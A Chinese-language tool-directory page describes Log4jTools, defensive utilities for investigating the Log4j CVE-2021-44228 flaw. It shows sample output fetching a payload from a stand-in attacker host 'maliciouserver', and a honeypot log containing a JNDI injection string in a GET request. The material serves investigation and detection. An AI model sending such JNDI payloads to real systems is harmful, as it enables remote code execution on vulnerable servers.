Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4jTools — 用于调查 Log4j CVE-2021-44228 的工具 | Kitploit
工具/GitHubGitHub/malwaretech/log4jtools
Payload生成漏洞分析漏洞利用信息收集入侵检测
GitHubmalwaretech/log4jtools

Log4jTools

用于调查 Log4j CVE-2021-44228 的工具

查看仓库
9412444年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4jTools

用于调查 Log4j CVE-2021-44228 的工具

漏洞说明与演示

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (从 JNDI 查找提供的 LDAP 路径获取 Java payload)

依赖:curl(系统自带),requests(Python)

示例命令:

python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py (蜜罐,用于捕获基于 '${' 存在的利用尝试)

依赖:python3,asyncore

示例命令:

python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1
下载工具